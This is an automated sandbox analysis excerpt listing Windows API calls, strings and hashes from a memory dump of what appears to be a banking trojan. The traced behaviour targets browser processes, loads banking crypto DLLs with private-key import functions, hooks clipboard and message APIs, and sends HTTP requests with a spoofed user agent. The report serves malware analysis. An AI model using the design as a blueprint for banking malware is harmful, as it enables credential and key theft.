                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC7DD0,00000000,00000000,00000000), ref: 02BC6E8C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6EA0
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC6EB1
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC8080,00000000,00000000,00000000), ref: 02BC6EC6
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,69889106a), ref: 02BC6ED6
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC6EF6
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02BC6F17
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(69889106a,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BC6F34
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 02BC6F3E
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02BFFB80), ref: 02BC6F49
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC79D0,00000000,00000000,00000000), ref: 02BC6F5B
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6F6B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC6F7C
                                                                                                                                                                                                              • Part of subcall function 02BB6DE0: memset.MSVCRT ref: 02BB6E00
                                                                                                                                                                                                              • Part of subcall function 02BB6DE0: Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02BB6E1C
                                                                                                                                                                                                              • Part of subcall function 02BB6DE0: CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02BB6E78
                                                                                                                                                                                                              • Part of subcall function 02BB6DE0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,76F90F10,?,00000000,00000000), ref: 02BB6EA0
                                                                                                                                                                                                              • Part of subcall function 02BB6DE0: CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02BB6EB8
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC6970,00000000,00000000,00000000), ref: 02BC6F91
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6FA1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC6FB2
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC54B0,00000000,00000000,00000000), ref: 02BC6FDC
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6FF0
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7001
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7010
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC7013
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7020
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC7023
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BC7047
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02BC7059
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 02BC7065
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC7074
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02BC7090
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02BC70B7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\java.exe), ref: 02BC70CD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02BC70E3
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02BC70F9
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\opera.exe), ref: 02BC710F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02BC7125
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02BC713B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\avant.exe), ref: 02BC7151
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02BC7167
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\safari.exe), ref: 02BC717D
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02BC7193
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02BC71A9
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\frd.exe), ref: 02BC71BF
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02BC71D5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02BC71EB
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCB8F0,00000000,00000000,00000000), ref: 02BC7219
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7233
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7240
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCEF80,00000000,00000000,00000000), ref: 02BC7255
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7269
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7276
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD0560,00000000,00000000,00000000), ref: 02BC728B
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC729F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC72AC
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD0E20,00000000,00000000,00000000), ref: 02BC72C1
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC72D5
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC72E2
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCF6A0,00000000,00000000,00000000), ref: 02BC72F7
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC730B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7318
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCCB80,00000000,00000000,00000000), ref: 02BC732D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7341
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC734E
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCCC20,00000000,00000000,00000000), ref: 02BC7363
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7377
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7384
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD1590,00000000,00000000,00000000), ref: 02BC7399
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC73AD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC73BA
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD24D0,00000000,00000000,00000000), ref: 02BC73CF
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC73E3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC73F0
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD31C0,00000000,00000000,00000000), ref: 02BC7405
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7419
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7426
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD32B0,00000000,00000000,00000000), ref: 02BC743B
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC744F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC745C
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCFE80,00000000,00000000,00000000), ref: 02BC7471
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7485
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7492
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD3480,00000000,00000000,00000000), ref: 02BC74A7
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC74BB
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC74C8
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD43F0,00000000,00000000,00000000), ref: 02BC74DD
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC74F1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC74FE
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD47D0,00000000,00000000,00000000), ref: 02BC7513
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7527
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7534
                                                                                                                                                                                                              • Part of subcall function 02BC5720: memset.MSVCRT ref: 02BC5741
                                                                                                                                                                                                              • Part of subcall function 02BC5720: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,76F8F550,75777390,76F90A60), ref: 02BC5757
                                                                                                                                                                                                              • Part of subcall function 02BC5720: RtlAddVectoredExceptionHandler.NTDLL(00000001,02BB3A20), ref: 02BC5764
                                                                                                                                                                                                              • Part of subcall function 02BC5720: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BC577F
                                                                                                                                                                                                              • Part of subcall function 02BC5720: CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02BC5799
                                                                                                                                                                                                              • Part of subcall function 02BC5720: GetHandleInformation.KERNEL32(00000000,?), ref: 02BC57B1
                                                                                                                                                                                                              • Part of subcall function 02BC5720: CloseHandle.KERNEL32(00000000), ref: 02BC57C2
                                                                                                                                                                                                              • Part of subcall function 02BC5720: InitializeCriticalSection.KERNEL32(02BFFB50), ref: 02BC57D3
                                                                                                                                                                                                              • Part of subcall function 02BC5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC57E9
                                                                                                                                                                                                              • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02BC57FB
                                                                                                                                                                                                              • Part of subcall function 02BC5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC581A
                                                                                                                                                                                                              • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02BC5828
                                                                                                                                                                                                              • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02BC5844
                                                                                                                                                                                                              • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02BC5860
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD19A0,00000000,00000000,00000000), ref: 02BC7549
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC755D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC756A
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD1C80,00000000,00000000,00000000), ref: 02BC757F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7593
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC75A0
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BB80C0,00000000,00000000,00000000), ref: 02BC75B5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC75CD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC75E6
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 02BC75FD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02BC7613
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02BC7625
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02BC7637
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02BC7649
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\core.exe), ref: 02BC765B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 02BC766D
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 02BC767F
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02BC76EC
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BC76FB
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BC7714
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02BC771B
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,69889606a), ref: 02BC7731
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BBBC50,00000000,00000000,00000000), ref: 02BC7745
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC775D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC776E
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007FD0,00000000,00000000,00000000), ref: 02BC7783
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC779B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC77AC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Create$Thread$Information$Close$Security$Descriptor$AddressProc$HeapProcessUser$AdminCriticalCurrentFreeInitializeModuleMutexPathSection$BackslashCommandConvertFileInfoLibraryLineLoadLocalNameNamedSaclStringVolume_snprintfmemset$DesktopDirectoryEnvironmentExceptionFolderHandlerMultipleObjectObjectsOpenQuerySleepSystemValidateValueVariableVectoredWaitWindowslstrcmpi
                                                                                                                                                                                                            • String ID: --no-sandbox$ --no-sandbox$69889106a$6988924Aa$69889606a$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$S:(ML;;NRNWNX;;;LW)$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1834009341-1062275841
                                                                                                                                                                                                            • Opcode ID: 7b964437f029fa5149bae66c0ba77c404d62993081a28f0ca6c61f134c4b30af
                                                                                                                                                                                                            • Instruction ID: 6cd75a8fa496be08719709b6edc995bb9f876f1e48dd8f08d25037a33eeef06f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b964437f029fa5149bae66c0ba77c404d62993081a28f0ca6c61f134c4b30af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60629131A81319B6F77097A48D4AFAEA7AC9F44B44F7045D8FB05B70C0DFB09A059BA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC5741
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,76F8F550,75777390,76F90A60), ref: 02BC5757
                                                                                                                                                                                                            • RtlAddVectoredExceptionHandler.NTDLL(00000001,02BB3A20), ref: 02BC5764
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BC577F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02BC5799
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC57B1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC57C2
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02BFFB50), ref: 02BC57D3
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC57E9
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02BC57FB
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC581A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02BC5828
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02BC5844
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02BC5860
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02BFFB38), ref: 02BC587B
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02BC5882
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02BC5892
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,02BB79E0,02C09E88), ref: 02BC58A8
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BC58C3
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BC58D8
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02BC58DF
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,69889606a), ref: 02BC58F1
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC590B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02BC591B
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,02BBBB50,02BFEB74), ref: 02BC5931
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BC5940
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BC5955
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02BC595C
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,69889606a), ref: 02BC596E
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,java), ref: 02BC59A2
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.exe), ref: 02BC59B4
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,frd.exe), ref: 02BC59CA
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02BC59E1
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02BC59EF
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02BC5A0B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02BC5A27
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02BFFB20), ref: 02BC5A42
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02BC5A6F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02BC5A7B
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02BC5A9A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02BC5AA6
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02BC5AC5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02BC5AD1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                            • String ID: .exe$69889606a$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$frd.exe$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
                                                                                                                                                                                                            • API String ID: 1248150503-3717161803
                                                                                                                                                                                                            • Opcode ID: 6e0cd89cfd34b965e37db1f9bff147307d11c219cd2b17d9c86010883a0569e8
                                                                                                                                                                                                            • Instruction ID: cd75bd8cc58f70b4831ba677a114415b8e6b007dcbdd572cc1aacb573b61f952
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e0cd89cfd34b965e37db1f9bff147307d11c219cd2b17d9c86010883a0569e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E91B171BC030576FA706AB55C8AFAA275C9F04F84FA044D8BB52F6091EBE4F5448B74
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4AED
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02BC4B27
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02BC4B2E
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4B3E
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC4B5D
                                                                                                                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02BC4BC2
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02BC4BE1
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02BC4C19
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02BC4C4A
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02BC4C5E
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BC4C7C
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02BC4C94
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02BC4CAA
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02BC4CCD
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02BC4D05
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BC4D2C
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,00000004,00000000,?,?,00000000), ref: 02BC4D4D
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02BC4D66
                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 02BC4D70
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001010,?,?,00000000), ref: 02BC4D83
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 02BC4D86
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4D9E
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02BC4DBB
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 02BC4DDC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4DEC
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4DFB
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E0B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E14
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E1B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E2C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E33
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E41
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E44
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E51
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E54
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000004,?,?,00000000), ref: 02BC4E6A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 02BC4E7B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Referer: http://www.google.com, xrefs: 02BC4C58
                                                                                                                                                                                                            • GET, xrefs: 02BC4BF5
                                                                                                                                                                                                            • HTTP/1.0, xrefs: 02BC4C11
                                                                                                                                                                                                            • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02BC4BBD
                                                                                                                                                                                                            • 6a52c6225f6f323, xrefs: 02BC4C66
                                                                                                                                                                                                            • S:(ML;;NRNWNX;;;LW), xrefs: 02BC4D27
                                                                                                                                                                                                            • POST, xrefs: 02BC4BFE, 02BC4C17
                                                                                                                                                                                                            • Content-Type: application/x-www-form-urlencoded, xrefs: 02BC4C42
                                                                                                                                                                                                            • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02BC4C6B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileHttpProcess$Request$Security$DescriptorFreeHeadersInternetmemset$HandleInfoOpenValidate$AllocAllocateCloseConnectConvertCreateInformationLocalLockNamedPointerQueryReadSaclSendStringUnlockWrite_snprintfmemcpy
                                                                                                                                                                                                            • String ID: 6a52c6225f6f323$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com$S:(ML;;NRNWNX;;;LW)
